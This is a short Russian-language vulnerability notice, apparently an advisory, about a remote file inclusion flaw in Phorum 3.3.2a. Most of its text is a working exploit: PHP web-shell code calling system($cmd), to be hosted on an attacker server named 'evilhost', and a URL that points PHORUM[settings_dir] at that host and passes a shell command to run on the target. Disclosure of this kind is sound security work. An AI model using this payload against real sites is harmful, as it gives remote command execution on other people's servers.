Phorum — форум,
написанный на php. Недостаток защиты в программе позволяет удаленным пользователям
подключать внешние php сценарии и выполнять произвольный код и команды.

Пример:

Создаем файл replace.php на сайте evilhost: 

<?
echo("<?
system(\"\$cmd\");
?>»);
?> 

Если PHP не поддерживается, то вносим: 

<?
system("$cmd");
?>

Затем ссылка

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir] =http://[evilhost]&cmd=ls

выполнит команду Ls на уязвимом сайте. 

Уязвимость обнаружена в Phorum version 3.3.2a.

Оставить мнение